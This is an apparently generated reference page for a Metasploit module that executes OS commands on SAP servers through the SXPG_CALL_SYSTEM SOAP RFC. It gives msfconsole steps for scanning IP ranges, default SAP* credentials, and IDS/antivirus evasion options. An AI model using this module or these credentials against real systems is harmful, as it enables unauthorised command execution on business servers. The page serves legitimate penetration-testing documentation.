SAP /sap/bc/soap/rfc SOAP Service SXPG_CALL_SYSTEM Function Command Injection - Metasploit


This page contains detailed information about how to use the auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: SAP /sap/bc/soap/rfc SOAP Service SXPG_CALL_SYSTEM Function Command Injection
Module: auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec
Source code: modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec.rb
Disclosure date: -
Last modification time: 2017-07-24 06:26:21 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: -

This module makes use of the SXPG_CALL_SYSTEM Remote Function Call, through the use of the /sap/bc/soap/rfc SOAP service, to inject and execute OS commands.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


This module is a scanner module, and is capable of testing against multiple hosts.

msf > use auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec
msf auxiliary(sap_soap_rfc_dbmcli_sxpg_call_system_command_exec) > show options
    ... show and set options ...
msf auxiliary(sap_soap_rfc_dbmcli_sxpg_call_system_command_exec) > set RHOSTS ip-range
msf auxiliary(sap_soap_rfc_dbmcli_sxpg_call_system_command_exec) > exploit

Other examples of setting the RHOSTS option:

Example 1:

msf auxiliary(sap_soap_rfc_dbmcli_sxpg_call_system_command_exec) > set RHOSTS 192.168.1.3-192.168.1.200 

Example 2:

msf auxiliary(sap_soap_rfc_dbmcli_sxpg_call_system_command_exec) > set RHOSTS 192.168.1.1/24

Example 3:

msf auxiliary(sap_soap_rfc_dbmcli_sxpg_call_system_command_exec) > set RHOSTS file:/tmp/ip_list.txt

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Go back to menu.

Msfconsole Usage


Here is how the scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec auxiliary module looks in the msfconsole:

msf6 > use auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec

msf6 auxiliary(scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec) > show info

       Name: SAP /sap/bc/soap/rfc SOAP Service SXPG_CALL_SYSTEM Function Command Injection
     Module: auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  nmonkee

Check supported:
  No

Basic options:
  Name          Current Setting  Required  Description
  ----          ---------------  --------  -----------
  CLIENT        001              yes       SAP Client
  CMD           id               yes       Command to run
  HttpPassword  06071992         yes       Password
  HttpUsername  SAP*             yes       Username
  OS            linux            yes       Target OS (Accepted: linux, windows)
  Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                         yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT         80               yes       The target port (TCP)
  SSL           false            no        Negotiate SSL/TLS for outgoing connections
  THREADS       1                yes       The number of concurrent threads (max one per host)
  VHOST                          no        HTTP server virtual host

Description:
  This module makes use of the SXPG_CALL_SYSTEM Remote Function Call, 
  through the use of the /sap/bc/soap/rfc SOAP service, to inject and 
  execute OS commands.

References:
  http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/
  http://labs.mwrinfosecurity.com/blog/2012/09/03/sap-parameter-injection

Module Options


This is a complete list of options available in the scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec auxiliary module:

msf6 auxiliary(scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec) > show options

Module options (auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   CLIENT        001              yes       SAP Client
   CMD           id               yes       Command to run
   HttpPassword  06071992         yes       Password
   HttpUsername  SAP*             yes       Username
   OS            linux            yes       Target OS (Accepted: linux, windows)
   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                         yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT         80               yes       The target port (TCP)
   SSL           false            no        Negotiate SSL/TLS for outgoing connections
   THREADS       1                yes       The number of concurrent threads (max one per host)
   VHOST                          no        HTTP server virtual host

Advanced Options


Here is a complete list of advanced options supported by the scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec auxiliary module:

msf6 auxiliary(scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec) > show advanced

Module advanced options (auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec):

   Name                  Current Setting                                     Required  Description
   ----                  ---------------                                     --------  -----------
   DOMAIN                WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS         true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   FingerprintCheck      true                                                no        Conduct a pre-exploit fingerprint verification
   HttpClientTimeout                                                         no        HTTP connection and receive timeout
   HttpRawHeaders                                                            no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace             false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors       red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly  false                                               no        Show HTTP headers only in HttpTrace
   SSLVersion            Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   ShowProgress          true                                                yes       Display progress messages during a scan
   ShowProgressPercent   10                                                  yes       The interval in percent that progress should be shown
   UserAgent             Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE               false                                               no        Enable detailed status messages
   WORKSPACE                                                                 no        Specify the workspace for this module

Auxiliary Actions


This is a list of all auxiliary actions that the scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec module can do:

msf6 auxiliary(scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec) > show actions

Auxiliary actions:

   Name  Description
   ----  -----------

Evasion Options


Here is the full list of possible evasion options supported by the scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 auxiliary(scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

[SAP] <IP>:<RPORT> - something went wrong!


Here is a relevant code snippet related to the "[SAP] <IP>:<RPORT> - something went wrong!" error message:

104:	          'sap-client'    => datastore['CLIENT'],
105:	          'sap-language'  => 'EN'
106:	        }
107:	      })
108:	      if res and res.code != 500 and res.code != 200
109:	        print_error("[SAP] #{ip}:#{rport} - something went wrong!")
110:	        return
111:	      elsif res and res.body =~ /faultstring/
112:	        error = res.body.scan(%r{<faultstring>(.*?)</faultstring>}).flatten
113:	        0.upto(output.length-1) do |i|
114:	          print_error("[SAP] #{ip}:#{rport} - error #{error[i]}")

[SAP] <IP>:<RPORT> - error <ERROR:I>


Here is a relevant code snippet related to the "[SAP] <IP>:<RPORT> - error <ERROR:I>" error message:

109:	        print_error("[SAP] #{ip}:#{rport} - something went wrong!")
110:	        return
111:	      elsif res and res.body =~ /faultstring/
112:	        error = res.body.scan(%r{<faultstring>(.*?)</faultstring>}).flatten
113:	        0.upto(output.length-1) do |i|
114:	          print_error("[SAP] #{ip}:#{rport} - error #{error[i]}")
115:	        end
116:	        return
117:	      elsif res
118:	        print_status("[SAP] #{ip}:#{rport} - got response")
119:	        output = res.body.scan(%r{<MESSAGE>([^<]+)</MESSAGE>}).flatten

[SAP] <IP>:<RPORT> - Unknown error


Here is a relevant code snippet related to the "[SAP] <IP>:<RPORT> - Unknown error" error message:

144:	          saptbl << [result[i].chomp]
145:	        end
146:	        print (saptbl.to_s)
147:	        return
148:	      else
149:	        print_error("[SAP] #{ip}:#{rport} - Unknown error")
150:	        return
151:	      end
152:	    rescue ::Rex::ConnectionError
153:	      print_error("[SAP] #{ip}:#{rport} - Unable to connect")
154:	      return

[SAP] <IP>:<RPORT> - Unable to connect


Here is a relevant code snippet related to the "[SAP] <IP>:<RPORT> - Unable to connect" error message:

147:	        return
148:	      else
149:	        print_error("[SAP] #{ip}:#{rport} - Unknown error")
150:	        return
151:	      end
152:	    rescue ::Rex::ConnectionError
153:	      print_error("[SAP] #{ip}:#{rport} - Unable to connect")
154:	      return
155:	    end
156:	  end
157:	end

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • nmonkee

Version


This page has been produced using Metasploit Framework version 6.1.27-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.